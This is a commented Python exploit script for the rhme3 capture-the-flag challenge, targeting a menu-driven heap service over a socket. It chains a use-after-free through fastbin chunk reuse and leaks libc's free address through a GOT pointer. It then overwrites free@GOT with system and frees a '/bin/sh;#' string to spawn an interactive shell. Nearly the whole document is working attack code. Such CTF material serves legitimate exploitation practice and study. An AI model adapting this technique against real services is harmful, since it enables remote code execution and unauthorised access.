rhme3 exploit challenge — heap use-after-free via fastbin reuse, leading to a GOT overwrite of free() with system()
import time | |
import telnetlib | |
import sys | |
import binascii | |
import struct | |
import socket | |
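# Target selection: `exploit.py [host [port]]`, defaulting to 127.0.0.1:1337.
HOST = "127.0.0.1" if len(sys.argv) < 2 else sys.argv[1]
# Fix: the original tested `len(sys.argv) < 2` here too, so giving only a host
# (`exploit.py <host>`) indexed sys.argv[2] and died with IndexError.
PORT = 1337 if len(sys.argv) < 3 else int(sys.argv[2])
TARGET = (HOST, PORT)
# NOTE: the connection is opened at import time; every helper below
# (ru, add_player, select, delete, interact) talks over this one socket.
sock = socket.create_connection(TARGET)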
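def ru(delim):
    """Read from the shared socket one byte at a time until the data ends with *delim*.

    Returns everything read, delimiter included. Raises EOFError if the peer
    closes the connection first: recv() then returns the empty string, and the
    original loop kept appending "" forever (e.g. after the target crashed
    mid-exploit) instead of reporting the failure.
    """
    buf = ""
    while not buf.endswith(delim):
        chunk = sock.recv(1)
        if not chunk:
            raise EOFError("connection closed while waiting for %r (got %r)" % (delim, buf))
        buf += chunk
    return buf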
def interact():
    """Hand the (hopefully exploited) connection over to the user.

    A telnetlib.Telnet object is created only to borrow its interact() loop
    (stdin -> socket, socket -> stdout); its socket is swapped for ours.
    NOTE: telnetlib is deprecated since Python 3.11 and removed in 3.13.
    """
    print("[*] interact now")
    shell = telnetlib.Telnet()
    shell.sock = sock
    shell.interact()
# Little-endian 32/64-bit (un)packing helpers, built on precompiled formats.
_LE_U32 = struct.Struct("<I")
_LE_U64 = struct.Struct("<Q")


def p32(v):
    """Pack integer *v* as a little-endian unsigned 32-bit value."""
    return _LE_U32.pack(v)


def p64(v):
    """Pack integer *v* as a little-endian unsigned 64-bit value."""
    return _LE_U64.pack(v)


def u32(v):
    """Unpack exactly 4 little-endian bytes into an unsigned integer."""
    return _LE_U32.unpack(v)[0]


def u64(v):
    """Unpack exactly 8 little-endian bytes into an unsigned integer."""
    return _LE_U64.unpack(v)[0]
def recv_menu():
    """Consume output up to and including the main menu prompt and return it."""
    prompt = "Your choice: "
    return ru(prompt)
def add_player(name, a, d, s, p):
    """Menu option 1: create a player.

    Sends *name* at the name prompt, then the four numeric stats in the order
    the target asks for them (two "points" prompts, then speed, then precision).
    Values are sent as their str() form; no validation is done client-side.
    """
    sock.sendall("1\n")
    ru("name: ")
    sock.sendall(name + "\n")
    stats = (
        ("points: ", a),
        ("points: ", d),
        ("speed: ", s),
        ("precision: ", p),
    )
    for prompt, value in stats:
        ru(prompt)
        sock.sendall(str(value) + "\n")
def select(index):
    """Menu option 3: mark the player at *index* as the selected one.

    Options 5 (show) and 4 (edit) in pwn() act on this selection, which is why
    selecting a player right before freeing it matters for the exploit.
    """
    choice = "3\n"
    sock.sendall(choice)
    ru("index: ")
    sock.sendall("%s\n" % index)
def delete(index):
    """Menu option 2: free the player at *index* (and, per the comments in
    pwn(), its name buffer) on the target."""
    choice = "2\n"
    sock.sendall(choice)
    ru("index: ")
    sock.sendall("%s\n" % index)
def info(s):
    """Print a progress line prefixed with "[*]" (works under Python 2 and 3)."""
    print("[*] %s" % s)
# Scratch slot for a heap address; pwn() declares it `global` but never writes
# it in this file, so it stays 0.
heap = 0
info("pwning on %s:%d" % (HOST, PORT))
def pwn():
    """Run the full exploit chain over the shared socket.

    Sequence, as laid out by the inline comments: create three players, free
    the one that is still *selected* so the selection dangles, reallocate over
    it so the stale player's name pointer aims at a GOT slot, read libc's free
    address through it, overwrite free@GOT with system, then free the player
    whose name starts with "/bin/sh;#" so that free() call lands in system().

    Side effects only: talks to `sock`, prints via info(), ends in interact().
    Assumes a non-PIE x86-64 target and one specific libc build (see the
    hard-coded GOT address and free->system offset below).
    """
    global heap  # declared but never assigned in this function
    # Player 0: 0x88-byte name.
    add_player("A"*0x88,1,2,3,4)
    recv_menu()
    # Player 1: its name is the string system() will eventually run; ";#"
    # ends the shell command and comments out whatever follows in the buffer.
    add_player("/bin/sh;#" + "A"*(0x88-9),1,2,3,4)
    recv_menu()
    # Player 2: a 0x17-byte name, so (per the fastbin comments below) the
    # name buffer and the player struct fall into the same small bin.
    add_player("D"*0x17,32,32,32,32) # will allocate struct2
    recv_menu()
    # Select player 2, then free it: the "selected" pointer presumably keeps
    # referencing the freed struct, which options 5 and 4 below then use.
    select(2)
    delete(2) # this causes fastbin[0x18] = [&struct2, &struct2->name]
    recv_menu()
    delete(0) # this causes fastbin[0x18] = [&struct0, &struct2, &struct2->name]
    recv_menu()
    # LIFO reuse: the new player struct takes &struct0 and its 0x18-byte name
    # takes the freed struct2, so this data overwrites struct2's fields. The
    # qword at offset 0x10 -- presumably struct2's name pointer -- becomes
    # 0x603018, which the comments below identify as free's GOT entry in this
    # non-PIE binary. Both the offset and the address are target-specific.
    add_player("A"*0x10 + p64(0x603018),5,5,5,5) # this will reallocate &struct0 to hold the player structure and &struct2 for the name
    recv_menu()
    # leak the address of free and compute the address of system from it
    # Option 5 shows the selected (stale) player's name, i.e. reads *0x603018.
    sock.sendall("5\n")
    ru("Name: ")
    # Read through the newline, drop it, zero-pad to 8 bytes for u64().
    # Caveats: a 0x0a byte inside the leaked pointer ends the read early, and
    # a line longer than 8 bytes makes struct.unpack raise.
    free_libc = u64(ru("\n")[:-1].ljust(8,"\0"))
    info("free at 0x%x" % free_libc)
    # Hard-coded free->system distance for the target's libc build; with any
    # other libc the final delete() jumps to the wrong address.
    system = free_libc - 0x3f160
    info("system at 0x%x" % system)
    # overwrite the address of free in the GOT with the address of system
    # Option 4, sub-choice 1 edits the selected player's name; the stale name
    # pointer makes that write land on 0x603018.
    sock.sendall("4\n")
    ru("choice: ")
    sock.sendall("1\n")
    ru("name: ")
    sock.sendall(p64(system) + "\n")
    recv_menu()
    # Presumably leaves the edit sub-menu; no prompt is consumed afterwards,
    # so delete(1) relies on the main menu being ready -- TODO confirm.
    sock.sendall("0\n")
    # trigger a call to system on our controlled string /bin/sh;#
    # Deleting player 1 calls free() on its name, and free@GOT is now system.
    delete(1)
    interact()
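# Only fire the exploit when run as a script, not when imported for its
# helpers. (The socket itself is still opened at import time, above.)
if __name__ == "__main__":
    # Sync to the first menu prompt, then run the exploit chain.
    recv_menu()
    pwn()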